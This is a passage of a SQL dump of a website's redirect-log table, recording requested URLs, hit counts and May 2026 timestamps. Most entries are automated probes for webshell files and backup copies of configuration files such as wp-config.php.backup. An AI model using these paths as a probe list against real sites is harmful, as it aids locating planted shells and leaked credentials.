08:29:56','0000-00-00 00:00:00',301),(64096,'http://mail.3s-technologies.com.tr/tr/cdxadmin.php',NULL,'','',3,0,'2026-05-04 08:30:03','0000-00-00 00:00:00',301),(64097,'http://mail.3s-technologies.com.tr/tr/seyv.php',NULL,'','',1,0,'2026-05-04 08:30:08','0000-00-00 00:00:00',301),(64098,'http://mail.3s-technologies.com.tr/tr/saxzgf5.php',NULL,'','',1,0,'2026-05-04 08:30:11','0000-00-00 00:00:00',301),(64099,'http://mail.3s-technologies.com.tr/tr/saxzw9t.php',NULL,'','',1,0,'2026-05-04 08:30:11','0000-00-00 00:00:00',301),(64100,'http://mail.3s-technologies.com.tr/tr/sder5252u.php',NULL,'','',1,0,'2026-05-04 08:30:13','0000-00-00 00:00:00',301),(64101,'http://mail.3s-technologies.com.tr/tr/sderty5u.php',NULL,'','',1,0,'2026-05-04 08:30:14','0000-00-00 00:00:00',301);
INSERT INTO `fz6t4_redirect_links` VALUES (64102,'http://mail.3s-technologies.com.tr/tr/checkout.php',NULL,'','',1,0,'2026-05-04 08:30:17','0000-00-00 00:00:00',301),(64103,'http://mail.3s-technologies.com.tr/tr/fictioner.php',NULL,'','',1,0,'2026-05-04 08:30:18','0000-00-00 00:00:00',301),(64104,'http://mail.3s-technologies.com.tr/tr/bc.php',NULL,'','',6,0,'2026-05-04 08:30:23','0000-00-00 00:00:00',301),(64105,'http://mail.3s-technologies.com.tr/tr/x402.php',NULL,'','',5,0,'2026-05-04 08:30:26','0000-00-00 00:00:00',301),(64106,'http://mail.3s-technologies.com.tr/tr/wp-slss.php',NULL,'','',2,0,'2026-05-04 22:56:17','0000-00-00 00:00:00',301),(64107,'http://mail.3s-technologies.com.tr/tr/wp-firewall.php',NULL,'','',2,0,'2026-05-04 22:56:29','0000-00-00 00:00:00',301),(64108,'http://mail.3s-technologies.com.tr/tr/wuasr.php',NULL,'','',2,0,'2026-05-04 22:56:31','0000-00-00 00:00:00',301),(64109,'http://mail.3s-technologies.com.tr/tr/wp-at.php',NULL,'','',2,0,'2026-05-04 22:56:49','0000-00-00 00:00:00',301),(64110,'http://3s-technologies.com.tr/tr/wp-slss.php',NULL,'','',4,0,'2026-05-05 11:59:34','0000-00-00 00:00:00',301),(64111,'http://3s-technologies.com.tr/tr/photo.php',NULL,'','',1,0,'2026-05-05 16:31:10','0000-00-00 00:00:00',301),(64112,'http://3s-technologies.com.tr/tr/dragonforce.php',NULL,'','',1,0,'2026-05-05 16:31:22','0000-00-00 00:00:00',301),(64113,'http://3s-technologies.com.tr/tr/checkinfo.php',NULL,'','',1,0,'2026-05-05 16:31:24','0000-00-00 00:00:00',301),(64114,'http://3s-technologies.com.tr/tr/test5.php',NULL,'','',2,0,'2026-05-05 16:31:25','0000-00-00 00:00:00',301),(64115,'http://3s-technologies.com.tr/tr/naik_dong.php',NULL,'','',1,0,'2026-05-05 16:31:27','0000-00-00 00:00:00',301),(64116,'http://3s-technologies.com.tr/tr/diag-php.php',NULL,'','',1,0,'2026-05-05 16:31:27','0000-00-00 00:00:00',301),(64117,'http://3s-technologies.com.tr/tr/installerui.php',NULL,'','',1,0,'2026-05-05 16:31:28','0000-00-00 00:00:00',301),(64118,'http://3s-technologies.com.tr/tr/connection_test.php',NULL,'','',1,0,'2026-05-05 16:31:29','0000-00-00 00:00:00',301),(64119,'http://3s-technologies.com.tr/tr/ping-pong.php',NULL,'','',1,0,'2026-05-05 16:31:32','0000-00-00 00:00:00',301),(64120,'http://3s-technologies.com.tr/tr/foreign_chars.php',NULL,'','',1,0,'2026-05-05 16:31:32','0000-00-00 00:00:00',301),(64121,'http://3s-technologies.com.tr/tr/con7ext.php',NULL,'','',1,0,'2026-05-05 16:31:33','0000-00-00 00:00:00',301),(64122,'http://3s-technologies.com.tr/tr/sql-test.php',NULL,'','',1,0,'2026-05-05 16:31:34','0000-00-00 00:00:00',301),(64123,'http://3s-technologies.com.tr/tr/server-status.php',NULL,'','',1,0,'2026-05-05 16:31:35','0000-00-00 00:00:00',301),(64124,'http://3s-technologies.com.tr/tr/prod-wp-config.php',NULL,'','',1,0,'2026-05-05 16:31:35','0000-00-00 00:00:00',301),(64125,'http://3s-technologies.com.tr/tr/phprelease.php',NULL,'','',1,0,'2026-05-05 16:31:36','0000-00-00 00:00:00',301),(64126,'http://3s-technologies.com.tr/tr/php-7.php',NULL,'','',1,0,'2026-05-05 16:31:37','0000-00-00 00:00:00',301),(64127,'http://3s-technologies.com.tr/tr/php-opcode.php',NULL,'','',1,0,'2026-05-05 16:31:38','0000-00-00 00:00:00',301),(64128,'http://mail.3s-technologies.com.tr/tr/3369.php',NULL,'','',4,0,'2026-05-06 23:12:03','0000-00-00 00:00:00',301),(64129,'http://mail.3s-technologies.com.tr/tr/dostshell.php',NULL,'','',4,0,'2026-05-06 23:12:03','0000-00-00 00:00:00',301),(64130,'http://3s-technologies.com.tr/tr/qrops.php',NULL,'','',1,0,'2026-05-07 22:31:42','0000-00-00 00:00:00',301),(64131,'http://mail.3s-technologies.com.tr/tr/bypassbest.php',NULL,'','',1,0,'2026-05-08 00:36:04','0000-00-00 00:00:00',301),(64132,'http://mail.3s-technologies.com.tr/tr/photo.php',NULL,'','',1,0,'2026-05-08 00:36:06','0000-00-00 00:00:00',301),(64133,'http://mail.3s-technologies.com.tr/tr/dragonforce.php',NULL,'','',1,0,'2026-05-08 00:36:16','0000-00-00 00:00:00',301),(64134,'http://mail.3s-technologies.com.tr/tr/checkinfo.php',NULL,'','',1,0,'2026-05-08 00:36:16','0000-00-00 00:00:00',301),(64135,'http://mail.3s-technologies.com.tr/tr/test5.php',NULL,'','',1,0,'2026-05-08 00:36:17','0000-00-00 00:00:00',301),(64136,'http://mail.3s-technologies.com.tr/tr/headerg.php',NULL,'','',1,0,'2026-05-08 00:36:18','0000-00-00 00:00:00',301),(64137,'http://mail.3s-technologies.com.tr/tr/naik_dong.php',NULL,'','',1,0,'2026-05-08 00:36:18','0000-00-00 00:00:00',301),(64138,'http://mail.3s-technologies.com.tr/tr/diag-php.php',NULL,'','',1,0,'2026-05-08 00:36:19','0000-00-00 00:00:00',301),(64139,'http://mail.3s-technologies.com.tr/tr/installerui.php',NULL,'','',1,0,'2026-05-08 00:36:20','0000-00-00 00:00:00',301),(64140,'http://mail.3s-technologies.com.tr/tr/connection_test.php',NULL,'','',1,0,'2026-05-08 00:36:21','0000-00-00 00:00:00',301),(64141,'http://mail.3s-technologies.com.tr/tr/zk.php',NULL,'','',1,0,'2026-05-08 00:36:21','0000-00-00 00:00:00',301),(64142,'http://mail.3s-technologies.com.tr/tr/wp-config.php.backup',NULL,'','',2,0,'2026-05-08 00:36:22','0000-00-00 00:00:00',301),(64143,'http://mail.3s-technologies.com.tr/tr/ping-pong.php',NULL,'','',1,0,'2026-05-08 00:36:24','0000-00-00 00:00:00',301),(64144,'http://mail.3s-technologies.com.tr/tr/foreign_chars.php',NULL,'','',1,0,'2026-05-08 00:36:25','0000-00-00 00:00:00',301),(64145,'http://mail.3s-technologies.com.tr/tr/con7ext.php',NULL,'','',1,0,'2026-05-08 00:36:25','0000-00-00 00:00:00',301),(64146,'http://mail.3s-technologies.com.tr/tr/sql-test.php',NULL,'','',1,0,'2026-05-08 00:36:26','0000-00-00 00:00:00',301),(64147,'http://mail.3s-technologies.com.tr/tr/server-status.php',NULL,'','',1,0,'2026-05-08 00:36:27','0000-00-00 00:00:00',301),(64148,'http://mail.3s-technologies.com.tr/tr/prod-wp-config.php',NULL,'','',1,0,'2026-05-08 00:36:27','0000-00-00 00:00:00',301),(64149,'http://mail.3s-technologies.com.tr/tr/phprelease.php',NULL,'','',1,0,'2026-05-08 00:36:28','0000-00-00 00:00:00',301),(64150,'http://mail.3s-technologies.com.tr/tr/php-7.php',NULL,'','',1,0,'2026-05-08 00:36:29','0000-00-00 00:00:00',301),(64151,'http://mail.3s-technologies.com.tr/tr/php-opcode.php',NULL,'','',1,0,'2026-05-08 00:36:30','0000-00-00 00:00:00',301),(64152,'http://mail.3s-technologies.com.tr/tr/k90.php',NULL,'','',1,0,'2026-05-08 00:36:30','0000-00-00 00:00:00',301),(64153,'http://mail.3s-technologies.com.tr/tr/124.php',NULL,'','',1,0,'2026-05-08 00:36:35','0000-00-00 00:00:00',301),(64154,'http://mail.3s-technologies.com.tr/tr/shout.php',NULL,'','',1,0,'2026-05-08 00:36:35','0000-00-00 00:00:00',301),(64155,'http://mail.3s-technologies.com.tr/tr/wp-mt.php',NULL,'','',1,0,'2026-05-08 00:36:37','0000-00-00 00:00:00',301),(64156,'http://mail.3s-technologies.com.tr/tr/qing.php',NULL,'','',1,0,'2026-05-08 00:36:42','0000-00-00 00:00:00',301),(64157,'http://mail.3s-technologies.com.tr/tr/mms.php',NULL,'','',1,0,'2026-05-08 00:36:43','0000-00-00 00:00:00',301),(64158,'https://3s-technologies.com.tr/en/plugins/generic/pdfjsviewer/pdf.js/web/viewer.html',NULL,'','',2,0,'2026-05-08 12:21:44','0000-00-00 00:00:00',301),(64159,'http://3s-technologies.com.tr/tr/3369.php',NULL,'','',4,0,'2026-05-08 13:03:42','0000-00-00 00:00:00',301),(64160,'http://3s-technologies.com.tr/tr/dostshell.php',NULL,'','',4,0,'2026-05-08 13:03:43','0000-00-00 00:00:00',301),(64161,'http://3s-technologies.com.tr/tr/wp-content/plugins/enhanced-text-widget/analyst/src/403.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/enhanced-text-widget/analyst/src/403.php','',2,0,'2026-05-09 01:59:46','0000-00-00 00:00:00',301),(64162,'http://3s-technologies.com.tr/tr/assets/images/selam.php',NULL,'http://3s-technologies.com.tr/assets/images/selam.php','',1,0,'2026-05-09 01:59:55','0000-00-00 00:00:00',301),(64163,'http://3s-technologies.com.tr/tr/wp-content/plugins/hello-plus/classes/ehp-sarang.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/hello-plus/classes/ehp-sarang.php','',2,0,'2026-05-09 01:59:57','0000-00-00 00:00:00',301),(64164,'http://3s-technologies.com.tr/tr/wp-content/edit-tags.php',NULL,'http://3s-technologies.com.tr/wp-content/edit-tags.php','',2,0,'2026-05-09 02:00:01','0000-00-00 00:00:00',301),(64165,'http://3s-technologies.com.tr/tr/.well-known/core.php',NULL,'http://3s-technologies.com.tr/.well-known/core.php','',2,0,'2026-05-09 02:00:04','0000-00-00 00:00:00',301),(64166,'http://3s-technologies.com.tr/tr/wp-includes/speculative8.php',NULL,'http://3s-technologies.com.tr/wp-includes/speculative8.php','',2,0,'2026-05-09 02:00:06','0000-00-00 00:00:00',301),(64167,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/phpmailer/s',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/PHPMailer/s','',2,0,'2026-05-09 02:00:08','0000-00-00 00:00:00',301),(64168,'http://3s-technologies.com.tr/tr/wp-content/themes/news-portal/sitebar.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/news-portal/sitebar.php','',2,0,'2026-05-09 02:00:15','0000-00-00 00:00:00',301),(64169,'http://3s-technologies.com.tr/tr/wp-content/languages/plugins',NULL,'http://3s-technologies.com.tr/wp-content/languages/plugins/','',2,0,'2026-05-09 02:00:19','0000-00-00 00:00:00',301),(64170,'http://3s-technologies.com.tr/tr/wp-content/themes/fukasawa/inc/classes/403.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/fukasawa/inc/classes/403.php','',2,0,'2026-05-09 02:00:21','0000-00-00 00:00:00',301),(64171,'http://3s-technologies.com.tr/tr/system_core.php',NULL,'http://3s-technologies.com.tr/system_core.php','',2,0,'2026-05-09 02:00:23','0000-00-00 00:00:00',301),(64172,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/modern/test2.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/modern/test2.php','',2,0,'2026-05-09 02:00:40','0000-00-00 00:00:00',301),(64173,'http://3s-technologies.com.tr/tr/wp-content/plugins/plugin',NULL,'http://3s-technologies.com.tr/wp-content/plugins/plugin/','',2,0,'2026-05-09 02:00:47','0000-00-00 00:00:00',301),(64174,'http://3s-technologies.com.tr/tr/wp-content/plugins/enhanced-text-widget/analyst/src/403x.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/enhanced-text-widget/analyst/src/403x.php','',2,0,'2026-05-09 02:00:52','0000-00-00 00:00:00',301),(64175,'http://3s-technologies.com.tr/tr/wp-content/uploads/config.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/config.php','',2,0,'2026-05-09 02:00:55','0000-00-00 00:00:00',301),(64176,'http://3s-technologies.com.tr/tr/wp-includes/blocks/pullquote',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/pullquote/','',2,0,'2026-05-09 02:00:58','0000-00-00 00:00:00',301),(64177,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core',NULL,'http://3s-technologies.com.tr/wp-includes/sodium_compat/src/Core/','',2,0,'2026-05-09 02:01:00','0000-00-00 00:00:00',301),(64178,'http://3s-technologies.com.tr/tr/wp-content/plugins/filester/assets/css/404.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/filester/assets/css/404.php','',2,0,'2026-05-09 02:01:02','0000-00-00 00:00:00',301),(64179,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/edit-post',NULL,'http://3s-technologies.com.tr/wp-includes/css/dist/edit-post/','',2,0,'2026-05-09 02:01:07','0000-00-00 00:00:00',301),(64180,'http://3s-technologies.com.tr/tr/wordpress/wp-admin/maint',NULL,'http://3s-technologies.com.tr/wordpress/wp-admin/maint/','',7,0,'2026-05-09 02:01:09','0000-00-00 00:00:00',301),(64181,'http://3s-technologies.com.tr/tr/wa',NULL,'http://3s-technologies.com.tr/wa/','',2,0,'2026-05-09 02:01:16','0000-00-00 00:00:00',301),(64182,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comment-date',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/comment-date/','',2,0,'2026-05-09 02:01:20','0000-00-00 00:00:00',301),(64183,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/themes/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/themes/about.php','',2,0,'2026-05-09 02:01:25','0000-00-00 00:00:00',301),(64184,'http://3s-technologies.com.tr/tr/wp-includes/panel.php',NULL,'http://3s-technologies.com.tr/wp-includes/panel.php','',2,0,'2026-05-09 02:01:30','0000-00-00 00:00:00',301),(64185,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comments-pagination-numbers',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/comments-pagination-numbers/','',2,0,'2026-05-09 02:01:39','0000-00-00 00:00:00',301),(64186,'http://3s-technologies.com.tr/tr/wp-admin/maint/includes',NULL,'http://3s-technologies.com.tr/wp-admin/maint/includes/','',2,0,'2026-05-09 02:01:40','0000-00-00 00:00:00',301),(64187,'http://3s-technologies.com.tr/tr/wp-includes/blocks/footnotes',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/footnotes/','',2,0,'2026-05-09 02:01:42','0000-00-00 00:00:00',301),(64188,'http://3s-technologies.com.tr/tr/wp-content/uploads/upload.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/upload.php','',2,0,'2026-05-09 02:01:46','0000-00-00 00:00:00',301),(64189,'http://3s-technologies.com.tr/tr/wp-domain.php',NULL,'http://3s-technologies.com.tr/wp-domain.php','',2,0,'2026-05-09 02:01:47','0000-00-00 00:00:00',301),(64190,'http://3s-technologies.com.tr/tr/wp-content/themes/radio.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/radio.php','',2,0,'2026-05-09 02:01:47','0000-00-00 00:00:00',301),(64191,'http://3s-technologies.com.tr/tr/wp-content/themes/fukasawa/inc/classes/403x.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/fukasawa/inc/classes/403x.php','',2,0,'2026-05-09 02:01:49','0000-00-00 00:00:00',301),(64192,'http://3s-technologies.com.tr/tr/wp-includes/config.php',NULL,'http://3s-technologies.com.tr/wp-includes/config.php','',2,0,'2026-05-09 02:01:51','0000-00-00 00:00:00',301),(64193,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/src/content/type',NULL,'http://3s-technologies.com.tr/wp-includes/SimplePie/src/Content/Type/','',2,0,'2026-05-09 02:01:52','0000-00-00 00:00:00',301),(64194,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-comments-form',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/post-comments-form/','',7,0,'2026-05-09 02:01:55','0000-00-00 00:00:00',301),(64195,'http://3s-technologies.com.tr/tr/wp-content/themes/neve/assets/apps/dashboard/build',NULL,'http://3s-technologies.com.tr/wp-content/themes/neve/assets/apps/dashboard/build/','',2,0,'2026-05-09 02:01:56','0000-00-00 00:00:00',301),(64196,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comment-content',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/comment-content/','',2,0,'2026-05-09 02:02:01','0000-00-00 00:00:00',301),(64197,'http://3s-technologies.com.tr/tr/wp-admin/network/cache',NULL,'http://3s-technologies.com.tr/wp-admin/network/cache/','',2,0,'2026-05-09 02:02:05','0000-00-00 00:00:00',301),(64198,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfour/patterns/file.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentyfour/patterns/file.php','',2,0,'2026-05-09 02:02:06','0000-00-00 00:00:00',301),(64199,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/images',NULL,'http://3s-technologies.com.tr/wp-includes/theme-compat/images/','',2,0,'2026-05-09 02:02:15','0000-00-00 00:00:00',301),(64200,'http://3s-technologies.com.tr/tr/wp-includes/block-bindings/maint',NULL,'http://3s-technologies.com.tr/wp-includes/block-bindings/maint/','',2,0,'2026-05-09 02:02:18','0000-00-00 00:00:00',301),(64201,'http://3s-technologies.com.tr/tr/wp-includes/blocks/separator',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/separator/','',2,0,'2026-05-09 02:02:21','0000-00-00 00:00:00',301),(64202,'http://3s-technologies.com.tr/tr/wp-includes/blocks/image',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/image/','',2,0,'2026-05-09 02:02:28','0000-00-00 00:00:00',301),(64203,'http://3s-technologies.com.tr/tr/wp-includes/blocks/video',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/video/','',2,0,'2026-05-09 02:02:30','0000-00-00 00:00:00',301),(64204,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfive',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentyfive/','',2,0,'2026-05-09 02:02:30','0000-00-00 00:00:00',301),(64205,'http://3s-technologies.com.tr/tr/wp-content/wp-activate.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-activate.php','',2,0,'2026-05-09 02:02:32','0000-00-00 00:00:00',301),(64206,'http://3s-technologies.com.tr/tr/wp-content/uploads/backup.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/backup.php','',2,0,'2026-05-09 02:02:34','0000-00-00 00:00:00',301),(64207,'http://3s-technologies.com.tr/tr/wp-includes/login.php',NULL,'http://3s-technologies.com.tr/wp-includes/login.php','',2,0,'2026-05-09 02:02:36','0000-00-00 00:00:00',301),(64208,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfour/assets',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentyfour/assets/','',2,0,'2026-05-09 02:02:37','0000-00-00 00:00:00',301),(64209,'http://3s-technologies.com.tr/tr/wp-content/login.php',NULL,'http://3s-technologies.com.tr/wp-content/login.php','',2,0,'2026-05-09 02:02:39','0000-00-00 00:00:00',301),(64210,'http://3s-technologies.com.tr/tr/wp-includes/js/dist/script-modules/block-library/navigation',NULL,'http://3s-technologies.com.tr/wp-includes/js/dist/script-modules/block-library/navigation/','',2,0,'2026-05-09 02:02:41','0000-00-00 00:00:00',301),(64211,'http://3s-technologies.com.tr/tr/wp-content/panel.php',NULL,'http://3s-technologies.com.tr/wp-content/panel.php','',2,0,'2026-05-09 02:02:42','0000-00-00 00:00:00',301),(64212,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/commands',NULL,'http://3s-technologies.com.tr/wp-includes/css/dist/commands/','',2,0,'2026-05-09 02:02:43','0000-00-00 00:00:00',301),(64213,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/assets/fonts',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentytwo/assets/fonts/','',2,0,'2026-05-09 02:02:48','0000-00-00 00:00:00',301),(64214,'http://3s-technologies.com.tr/tr/wp-includes/assets/chosen.php',NULL,'http://3s-technologies.com.tr/wp-includes/assets/chosen.php','',2,0,'2026-05-09 02:02:49','0000-00-00 00:00:00',301),(64215,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/sass/site',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentynineteen/sass/site/','',2,0,'2026-05-09 02:02:51','0000-00-00 00:00:00',301),(64216,'http://3s-technologies.com.tr/tr/wp-content/wp-config-backup.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-config-backup.php','',2,0,'2026-05-09 02:02:51','0000-00-00 00:00:00',301),(64217,'http://3s-technologies.com.tr/tr/wp-includes/html-api/widgets',NULL,'http://3s-technologies.com.tr/wp-includes/html-api/widgets/','',2,0,'2026-05-09 02:02:54','0000-00-00 00:00:00',301),(64218,'http://3s-technologies.com.tr/tr/wp-content/edit-wolf.php',NULL,'http://3s-technologies.com.tr/wp-content/edit-wolf.php','',2,0,'2026-05-09 02:02:56','0000-00-00 00:00:00',301),(64219,'http://3s-technologies.com.tr/tr/wp-content/system.php',NULL,'http://3s-technologies.com.tr/wp-content/system.php','',2,0,'2026-05-09 02:02:58','0000-00-00 00:00:00',301),(64220,'http://3s-technologies.com.tr/tr/wp-content/plugins/adminfuns.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/adminfuns.php','',2,0,'2026-05-09 02:03:01','0000-00-00 00:00:00',301),(64221,'http://3s-technologies.com.tr/tr/wp-content/plugins/beteng83/ws78.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/beteng83/ws78.php','',2,0,'2026-05-09 02:03:04','0000-00-00 00:00:00',301),(64222,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/template-singl-portfolio.php',NULL,'http://3s-technologies.com.tr/wp-includes/Text/Diff/Engine/template-singl-portfolio.php','',2,0,'2026-05-09 02:03:04','0000-00-00 00:00:00',301),(64223,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comments-pagination-next',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/comments-pagination-next/','',2,0,'2026-05-09 02:03:07','0000-00-00 00:00:00',301),(64224,'http://3s-technologies.com.tr/tr/wp-admin/images/html-api',NULL,'http://3s-technologies.com.tr/wp-admin/images/html-api/','',2,0,'2026-05-09 02:03:08','0000-00-00 00:00:00',301),(64225,'http://3s-technologies.com.tr/tr/wp-admin/class.php',NULL,'http://3s-technologies.com.tr/wp-admin/class.php','',2,0,'2026-05-09 02:03:09','0000-00-00 00:00:00',301),(64226,'http://3s-technologies.com.tr/tr/wp-admin/network/colors',NULL,'http://3s-technologies.com.tr/wp-admin/network/colors/','',2,0,'2026-05-09 02:03:10','0000-00-00 00:00:00',301),(64227,'http://3s-technologies.com.tr/tr/wp-includes/module.php',NULL,'http://3s-technologies.com.tr/wp-includes/module.php','',2,0,'2026-05-09 02:03:13','0000-00-00 00:00:00',301),(64228,'http://3s-technologies.com.tr/tr/wp-includes/blocks/widget-group',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/widget-group/','',2,0,'2026-05-09 02:03:16','0000-00-00 00:00:00',301),(64229,'http://3s-technologies.com.tr/tr/wp-admin/config.php',NULL,'http://3s-technologies.com.tr/wp-admin/config.php','',2,0,'2026-05-09 02:03:17','0000-00-00 00:00:00',301),(64230,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-content',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/post-content/','',2,0,'2026-05-09 02:03:19','0000-00-00 00:00:00',301),(64231,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-blog.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/wp-blog.php','',2,0,'2026-05-09 02:03:20','0000-00-00 00:00:00',301),(64232,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-terms',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/post-terms/','',2,0,'2026-05-09 02:03:25','0000-00-00 00:00:00',301),(64233,'http://3s-technologies.com.tr/tr/wp-includes/blocks/legacy-widget',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/legacy-widget/','',2,0,'2026-05-09 02:03:27','0000-00-00 00:00:00',301),(64234,'http://3s-technologies.com.tr/tr/wp-includes/blocks/navigation-submenu',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/navigation-submenu/','',2,0,'2026-05-09 02:03:30','0000-00-00 00:00:00',301),(64235,'http://3s-technologies.com.tr/tr/wp-content/uploads/users.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/users.php','',2,0,'2026-05-09 02:03:32','0000-00-00 00:00:00',301),(64236,'http://3s-technologies.com.tr/tr/wp-includes/requests/library/222.php',NULL,'http://3s-technologies.com.tr/wp-includes/Requests/library/222.php','',2,0,'2026-05-09 02:03:34','0000-00-00 00:00:00',301),(64237,'http://3s-technologies.com.tr/tr/wp-admin/css/chosen.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/chosen.php','',2,0,'2026-05-09 02:03:37','0000-00-00 00:00:00',301),(64238,'http://3s-technologies.com.tr/tr/wp-admin/maint/network',NULL,'http://3s-technologies.com.tr/wp-admin/maint/network/','',2,0,'2026-05-09 02:03:38','0000-00-00 00:00:00',301),(64239,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/widgets',NULL,'http://3s-technologies.com.tr/wp-includes/PHPMailer/widgets/','',2,0,'2026-05-09 02:03:39','0000-00-00 00:00:00',301),(64240,'http://3s-technologies.com.tr/tr/wp-content/plugins/woocommerce/includes/import/about.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/woocommerce/includes/import/about.php','',2,0,'2026-05-09 02:03:43','0000-00-00 00:00:00',301),(64241,'http://3s-technologies.com.tr/tr/wp-includes/blocks/paragraph',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/paragraph/','',2,0,'2026-05-09 02:03:44','0000-00-00 00:00:00',301),(64242,'http://3s-technologies.com.tr/tr/wp-includes/blocks/query-pagination',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/query-pagination/','',2,0,'2026-05-09 02:03:45','0000-00-00 00:00:00',301),(64243,'http://3s-technologies.com.tr/tr/wp-content/themes/astra/assets/css',NULL,'http://3s-technologies.com.tr/wp-content/themes/astra/assets/css/','',2,0,'2026-05-09 02:03:48','0000-00-00 00:00:00',301),(64244,'http://3s-technologies.com.tr/tr/wp-includes/customize/222.php',NULL,'http://3s-technologies.com.tr/wp-includes/customize/222.php','',2,0,'2026-05-09 02:03:49','0000-00-00 00:00:00',301),(64245,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfour/patterns/template-singl-portfolio.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentyfour/patterns/template-singl-portfolio.php','',2,0,'2026-05-09 02:03:51','0000-00-00 00:00:00',301),(64246,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/wp-conflg.php',NULL,'http://3s-technologies.com.tr/wp-admin/js/widgets/wp-conflg.php','',2,0,'2026-05-09 02:03:53','0000-00-00 00:00:00',301),(64247,'http://3s-technologies.com.tr/tr/wp-includes/requests/src/exception',NULL,'http://3s-technologies.com.tr/wp-includes/Requests/src/Exception/','',2,0,'2026-05-09 02:03:54','0000-00-00 00:00:00',301),(64248,'http://3s-technologies.com.tr/tr/wp-includes/blocks/pattern',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/pattern/','',2,0,'2026-05-09 02:03:55','0000-00-00 00:00:00',301),(64249,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-load.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-load.php','',2,0,'2026-05-09 02:03:56','0000-00-00 00:00:00',301),(64250,'http://3s-technologies.com.tr/tr/wp-content/themes/news-portal/user-install.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/news-portal/user-install.php','',2,0,'2026-05-09 02:03:57','0000-00-00 00:00:00',301),(64251,'http://3s-technologies.com.tr/tr/wp-includes/blocks/table',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/table/','',2,0,'2026-05-09 02:03:57','0000-00-00 00:00:00',301),(64252,'http://3s-technologies.com.tr/tr/wp-admin/images/block-bindings',NULL,'http://3s-technologies.com.tr/wp-admin/images/block-bindings/','',2,0,'2026-05-09 02:03:58','0000-00-00 00:00:00',301),(64253,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-cache-sys',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-cache-sys/','',2,0,'2026-05-09 02:03:59','0000-00-00 00:00:00',301),(64254,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comments-less.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/comments-less.php','',2,0,'2026-05-09 02:04:01','0000-00-00 00:00:00',301),(64255,'http://3s-technologies.com.tr/tr/wp-includes/assets/script-loader-react-refresh.php',NULL,'http://3s-technologies.com.tr/wp-includes/assets/script-loader-react-refresh.php','',2,0,'2026-05-09 02:04:02','0000-00-00 00:00:00',301),(64256,'http://3s-technologies.com.tr/tr/wp-includes/blocks/accordion',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/accordion/','',2,0,'2026-05-09 02:04:03','0000-00-00 